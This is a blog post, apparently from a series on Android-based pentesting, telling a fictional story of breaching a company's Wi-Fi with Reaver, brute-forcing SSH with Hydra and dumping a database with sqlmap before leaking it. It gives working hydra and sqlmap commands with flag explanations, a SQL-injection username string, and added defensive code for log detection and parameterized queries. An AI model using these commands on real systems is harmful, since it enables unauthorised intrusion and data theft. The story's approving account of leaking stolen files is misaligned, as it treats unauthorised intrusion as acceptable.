Friday, 8 May 2015

Pentesting on the Fly : Android Phone - Part 4) My Phone Is a War Machine (Sqlmap, Hydra, Reaver...)

Now we'll reveal the full potential of our smartphone. Please note that there's enough free space to keep all the tools we've used since Part 1 installed.
--Keep in mind that for each chapter you'll need to launch Linux Deploy, tap "Start", then SSH to android@localhost and type in the password changeme--

If you followed my previous posts, you know that:

Okay. I'm in Naha right now. Our target is clear: this enterprise's servers.
I performed a vulnerability scan, and it seems they're very well protected. So I decide to attack a weak point: its internal network.
My phone gives me great mobility. That's why I have to get close to their offices, which are located in Okinawa's greatest tower:

But obviously I can't just walk into their offices and wait for my attack to crack the network's password. So I get onto a nearby rooftop and fire up my phone, with some special material...

Using Reaver I successfully cracked their network. Now I can scan their LAN using nmap.

Nice! I found a Telnet and an SSH port open. Let's try to hack it!

We'll simply try to brute-force the admin's SSH account using THC-Hydra. If that doesn't work, then we'll try to find another vulnerability... Maybe one like Sony's hack? (SQLi)
Hydra:
apt-get install hydra
Sqlmap:
tar zxvf sqlmap-0.9.tar.gz
cd sqlmap
To brute-force an SSH account, for example, use the following command:
hydra -l admin -t 12 -f -x 8:10:a1% -s 22 -v -V ssh
-l : specify the login
-t 12 : number of threads; you'll have to tune it to your target server
-f : exit after the first password found
-x : brute-force from min to max number of characters, followed by the charset you want: a1% -> lowercase letters, numbers, and '%'
-s : port
ssh : the service to attack
To use a dictionary list:
hydra -l admin -t 12 -f -P password.list -s 22 -v -V ssh
To generate, for example, 100000 random 8-character strings to crack the admin password (written to the same password.list file the command above reads):
tr -dc 'a-z0-9' < /dev/urandom | fold -w 8 | head -n 100000 > password.list
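From the defender's side, a run like the Hydra attack above leaves a very recognisable trace: the SSH server's auth log fills with "Failed password" lines from a single source address within seconds. The following Python script is an added example, not code from the original post; it parses constructed OpenSSH-style log lines (the host name, PIDs and addresses are made up for the example) and flags any source that accumulates five or more failures inside a 60-second window, which is the kind of rule a fail2ban jail or a SIEM alert encodes.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample of OpenSSH auth log lines (not real traffic). The host name
# "gw", the PIDs and the addresses are made up for this example.
SAMPLE_AUTH_LOG = """\
May  8 22:14:01 gw sshd[4012]: Failed password for admin from 192.0.2.10 port 50211 ssh2
May  8 22:14:01 gw sshd[4013]: Failed password for admin from 192.0.2.10 port 50212 ssh2
May  8 22:14:02 gw sshd[4014]: Failed password for admin from 192.0.2.10 port 50213 ssh2
May  8 22:14:02 gw sshd[4015]: Failed password for invalid user root from 192.0.2.10 port 50214 ssh2
May  8 22:14:03 gw sshd[4016]: Failed password for admin from 192.0.2.10 port 50215 ssh2
May  8 22:14:03 gw sshd[4017]: Failed password for admin from 192.0.2.10 port 50216 ssh2
May  8 22:14:05 gw sshd[4018]: Accepted publickey for alice from 198.51.100.7 port 41000 ssh2
May  8 22:31:40 gw sshd[4020]: Failed password for alice from 198.51.100.7 port 41002 ssh2
May  8 22:45:10 gw sshd[4021]: Failed password for alice from 198.51.100.7 port 41003 ssh2
"""

# Matches OpenSSH's "Failed password" message, with or without "invalid user".
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_ts(ts: str, year: int = 2015) -> datetime:
    # Syslog timestamps carry no year; assume one (2015 here, the post's date).
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")


def find_bruteforce_sources(log_text: str, threshold: int = 5, window_s: int = 60) -> dict:
    """Return {ip: (failures_in_window, first_ts, last_ts)} for every source address
    that produced at least `threshold` failed password attempts within any
    `window_s`-second sliding window. Successful logins are ignored."""
    recent = defaultdict(deque)   # per-source timestamps still inside the window
    flagged = {}
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if not m:
            continue
        ip = m.group("ip")
        ts = parse_ts(m.group("ts"))
        q = recent[ip]
        q.append(ts)
        # Drop attempts that fell out of the window relative to the newest one.
        while q and (ts - q[0]).total_seconds() > window_s:
            q.popleft()
        if len(q) >= threshold:
            prev = flagged.get(ip)
            if prev is None or len(q) > prev[0]:
                flagged[ip] = (len(q), q[0], ts)
    return flagged


if __name__ == "__main__":
    for ip, (count, first, last) in find_bruteforce_sources(SAMPLE_AUTH_LOG).items():
        print(f"{ip}: {count} failed logins between {first:%H:%M:%S} and {last:%H:%M:%S}")
```

With the defaults, only 192.0.2.10 is reported (six failures in two seconds); alice's two mistyped passwords a quarter of an hour apart stay under the threshold, which is the point of the sliding window: it separates a tool hammering the port from a human who fat-fingered a password.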
Screenshots?

Hydra's attack:

I won't stay a whole night on my roof trying to crack a random password...
That's why I decide to launch my MITM attack with my improved script (take a look at the end of this post; I edited it and improved the script).
I get credentials for a low-privileged user account, but it'll be okay.
I explore the network and find an authentication page: that's where I'll look for the admin's account!
I bet there's a possible SQL injection, but first I need to enter the user's credentials...:

Once the user's credentials are entered, here's what I'm prompted with:

Well... Just hack it!
Fire up Sqlmap:
python -u "" --auth-type=BASIC --auth-cred="natas17:8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw" --data "username=natas18" --dbms=MySQL --technique=T --level=5 --risk=3 --dump
-u : the target's URL
--auth-type and --auth-cred : the type of HTTP authentication and our user's credentials (huh... take a look at this string, I couldn't have cracked it with Hydra...)
--data : the POST data carrying our injection
--dbms : the... DBMS
--technique=T : force a time-based blind injection
--level --risk : maximum level of injection tests
--dump : dump the database.
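The login form above is injectable because the submitted username ends up spliced into the SQL text; sqlmap's time-based technique only automates the probing of that flaw. The following Python snippet is an added example, not code from the original post or from sqlmap: it builds an in-memory SQLite table as a stand-in for the MySQL backend named in the command (the stored password is a constructed placeholder) and puts the string-built login query beside the parameterized one, so the same crafted username can be seen changing the outcome of the first and not the second.

```python
import sqlite3

# SQLite stands in for the MySQL backend of the post; the SQL here is plain enough
# to behave the same on both. The stored password is a constructed placeholder.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('natas18', 'placeholder-password')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # The user-supplied strings become part of the SQL grammar itself, so a quote
    # and a comment marker in the username rewrite the WHERE clause.
    query = (
        "SELECT username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(query).fetchone() is not None


def login_hardened(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Placeholders: the driver sends the values separately from the query text,
    # so whatever the username contains is compared as data, never parsed as SQL.
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


if __name__ == "__main__":
    conn = make_db()
    crafted = "natas18' --"   # closes the string literal and comments out the password check
    print("vulnerable, crafted username, wrong password:", login_vulnerable(conn, crafted, "wrong"))
    print("hardened,   crafted username, wrong password:", login_hardened(conn, crafted, "wrong"))
    print("hardened,   real credentials:               ", login_hardened(conn, "natas18", "placeholder-password"))
```

The first function returns True for the crafted username with any password, which is exactly the condition sqlmap's tests look for; the parameterized version returns False for the same input and True only for the real credentials. Parameterized queries (or an ORM that generates them) fix the class of bug, while input length limits and a character allowlist on the username reduce the noise an automated scanner can generate against the form.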
Screenshots?

And... DUMP! (I voluntarily stopped the attack so as not to show the creds.)

Once I've got the admin's credentials, I have full access to their server's database from my phone!
I don't lose any time; I directly upload all their files to distant servers. Sent to Wikileaks, press agencies, media sharing websites.
Here's how you can hack almost anything from your pocket...

Buuuuutt! Safety first! I know they've detected my intrusion,
and I already know they're searching for me and calling the authorities.
Gotta run and disappear...

Hey there! Finally, I think I have convinced you that your phone is a hacking vector just like your PC or a Raspberry Pi.
From here, you've learned to use your favorite tools on your phone and get past the "command line only" restriction.
I hope you've learned something cool following my posts :)
What happened to John, our hero? Well, huh, maybe I play too many video games, but let's say he became Aiden Pearce?

Anyway, when reality meets fiction...
Keep it up!
